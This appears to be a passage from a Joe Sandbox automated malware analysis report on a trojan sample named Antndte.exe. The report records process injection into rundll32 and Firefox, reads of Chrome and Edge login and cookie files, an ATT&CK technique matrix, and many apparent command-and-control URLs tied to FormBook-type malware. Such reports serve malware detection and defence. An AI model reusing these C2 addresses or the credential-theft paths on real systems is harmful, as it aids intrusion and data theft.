        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B510D mov eax, dword ptr fs:[00000030h]2_2_357B510D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A91F0 mov eax, dword ptr fs:[00000030h]2_2_357A91F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A91F0 mov eax, dword ptr fs:[00000030h]2_2_357A91F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DF1F0 mov eax, dword ptr fs:[00000030h]2_2_357DF1F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DF1F0 mov eax, dword ptr fs:[00000030h]2_2_357DF1F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A81EB mov eax, dword ptr fs:[00000030h]2_2_357A81EB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B91E5 mov eax, dword ptr fs:[00000030h]2_2_357B91E5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B91E5 mov eax, dword ptr fs:[00000030h]2_2_357B91E5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583A130 mov eax, dword ptr fs:[00000030h]2_2_3583A130
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F13E mov eax, dword ptr fs:[00000030h]2_2_3586F13E
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01C0 mov eax, dword ptr fs:[00000030h]2_2_357C01C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01C0 mov eax, dword ptr fs:[00000030h]2_2_357C01C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E31BE mov eax, dword ptr fs:[00000030h]2_2_357E31BE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E31BE mov eax, dword ptr fs:[00000030h]2_2_357E31BE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35885149 mov eax, dword ptr fs:[00000030h]2_2_35885149
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov ecx, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov eax, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov eax, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE1A4 mov eax, dword ptr fs:[00000030h]2_2_357EE1A4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE1A4 mov eax, dword ptr fs:[00000030h]2_2_357EE1A4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D9194 mov eax, dword ptr fs:[00000030h]2_2_357D9194
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1190 mov eax, dword ptr fs:[00000030h]2_2_357F1190
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1190 mov eax, dword ptr fs:[00000030h]2_2_357F1190
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3580717A mov eax, dword ptr fs:[00000030h]2_2_3580717A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3580717A mov eax, dword ptr fs:[00000030h]2_2_3580717A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B7072 mov eax, dword ptr fs:[00000030h]2_2_357B7072
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6074 mov eax, dword ptr fs:[00000030h]2_2_357B6074
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6074 mov eax, dword ptr fs:[00000030h]2_2_357B6074
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586B0AF mov eax, dword ptr fs:[00000030h]2_2_3586B0AF
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B1051 mov eax, dword ptr fs:[00000030h]2_2_357B1051

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7DF120000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\Antndte.exe Section loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Antndte.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe Thread APC queued: target process: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
        Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7DF120000
        Source: C:\Users\user\Desktop\Antndte.exe Process created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exe
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00403373 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, OleUninitialize, ExitProcess, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, LdrInitializeThunk, CopyFileW, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

        Stealing of Sensitive Information

        Source: Yara match File source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
        Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 1 System Shutdown/Reboot | Acquire Infrastructure | Gather Victim Identity Information
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 411 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
        Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses
        Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 1 Clipboard Data | Traffic Duplication | 5 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names
        Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 4 System Information Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information
        Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties
        External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Rundll32 | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS
        Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | | | Defacement | Serverless | Network Trust Dependencies
        [Behavior graph. ID: 1353242, Sample: Antndte.exe, Startdate: 04/12/2023, Architecture: WINDOWS, Score: 100. Process chain: Antndte.exe -> Antndte.exe (started) -> czazZqNSMxullu.exe (injected) -> rundll32.exe (started) -> czazZqNSMxullu.exe (injected) and firefox.exe (started).]

        Source | Detection | Scanner | Label | Link
        Antndte.exe | 16% | ReversingLabs | Win32.Trojan.InjectorX |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsm118D.tmp\LangDLL.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.rtptornado4dnihboss.com/3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.austintrafficlawyer.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.littlehappiez.com/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.echolinkevolve.xyz/3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.homesteadmath.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.rtptornado4dnihboss.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.littlehappiez.com/3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1true
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.echolinkevolve.xyz/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.brls.money/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.080869.com/3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://doc-0c-0k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8false
                                                                        high
                                                                        http://www.metodomestredojogo.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.080869.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.fisiocomoterapia.com/3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.opleverdossier.online/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.engindenizyurdu.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.opleverdossier.online/3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.slimnthinau.com/3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.neuvillette.org/3hr5/true
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.vaultedjewelry.com/3hr5/true
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.eigenheimstattmiete.com/3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1353242
Start date and time: 2023-12-04 15:19:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Antndte.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/11@27/19
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 57
• Number of non-executed functions: 255
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Antndte.exe
Time | Type | Description
15:22:48 | API Interceptor | 47411502x Sleep call for process: rundll32.exe modified
                                                                                        http://www.uzerly.netGet hashmaliciousAudio PhisherBrowse
                                                                                        • www.uzerly.net/favicon.ico
                                                                                        37.97.254.27hesaphareketi-01.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.rocsys.net/uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==
                                                                                        New_Order.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw
                                                                                        PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.wrautomotive.online/ahec/
                                                                                        PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                                                        Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                        • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                                                        Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                                                        25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                                                        PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
